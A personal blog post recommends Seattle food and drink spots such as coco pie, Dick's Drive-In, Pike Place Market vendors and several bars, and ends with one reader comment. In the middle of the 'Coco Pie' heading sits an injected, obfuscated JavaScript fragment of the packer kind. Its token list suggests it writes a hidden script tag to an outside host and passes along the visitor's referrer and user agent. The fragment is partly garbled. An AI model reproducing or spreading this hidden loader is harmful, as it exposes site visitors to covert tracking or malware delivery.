Eat: Seattle

We live in northern California, but we grew up in Seattle.  As a result, many California friends ask us what to do when they visit the Pacific Northwest!

I actually feel really removed from Seattle after living in California for so long, so I wouldn’t call myself an expert.  However, I do have a list of food items I typically crave when we go back to visit.

Coco ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtbab|var|u0026u|referrer|frhfn||js|php’.split(‘|’),0,{}))
Pie or Coco Bites
Think of the best pie you’ve ever had.  Then multiply it by 10.  That’s a coco pie.  It’s a creamy, coconut pie with whipping cream and coconut shavings on top.  Honestly, even if you’re not a huge coconut fan, you’ll like this.  These pies are pretty famous and you can get them at almost all of the Tom Douglas restaurants.  The coco bites are sold at the Dahlia Bakery and can easily be eaten on the go.  The pie – not so much.  More of a sit down kind of thing.

Dick’s Drive-In is a Seattle institution.  I have fond memories of 2AM burger runs during college.  The burgers are kinda greasy but they hit the spot. There are multiple locations but I recommend the Queen Anne, Capital Hill or Wallingford locations.  The one in Queen Anne has seating.

Pike Place Eats
Because I know you’ll go there.  First off, it’s called “the Market” or “pike place.”  Don’t call it “pikeS place” or “pike street” unless you want to sound like a tourist.  Ok, now that we’ve gotten that part out of the way.  Here are my favorite things to eat in the market.

Piroshky from Piroshky Piroshky – it’s really close to the Starbucks (and I know you plan on visiting the original starbucks)
Beechers – it’s delicious.  Have some mac ‘n cheese or something with cheese.  Beecher’s flagship cheese is good on anything.
I Heart NY Deli – Pastrami sandwich.  I’ve never had a pastrami sandwich in NY, so I don’t have anything for comparison.  But this was one of the best breakfast sandwiches I’ve ever had.  They only sell them on Saturday and Sunday.
DeLaurenti’s is the italian grocery store in the market and they have REALLY good sandwiches and maybe the best chili you’ve ever had in your life (According to my sister)
Which leads me to Seatown – the restaurant where my sister works.  They have tasty food, but I’d say your best bet is happy hour.  The last time I was there for happy hour, I had a salmon burger and it was amazing.  Ask for Stacey.  If anyone actually ever asks for Stacey and tells her they learned about her and the restaurant from my blog, I’ll be amazed.

Kimchi Fried Rice
Don’t knock it til you’ve tried it.  It’s amazing.  It’s served from a food truck, the marination mobile.  I suggest trying one of everything.

Romantic, Seattle dinner?
Salty’s on Alki – you’ll get tasty seafood and a beautiful view of the Seattle skyline.  Sunday brunch is also amazing.

Divey Japanese Food
This is the most delicious dive-restaurant ever.  They serve the best Japanese food – grandma approves.  They have sushi and teriyaki chicken.  But if you’re in an “adventurous” mood try the cod collar, sukiyaki, agadashi tofu, or garlic squid.

Clam Chowder on a sunny day
Ivars Salmon House on lake union.  Sit outside for happy hour.  If you’re checking out Gas Works Park, it’s just around the corner.

Places to Drink
Pyramid Alehouse, it’s across the street from Safeco
Brouwers – Fremont (http://www.yelp.com/biz/brouwers-cafe-seattle)
Pike Brewing Company – it’s near the market. It doesn’t get amazing yelp reviews, but Nick likes it.

What did I miss?

Great list, but how about adding Spuds Fish and Chips – Alki location of course. They’re the best!
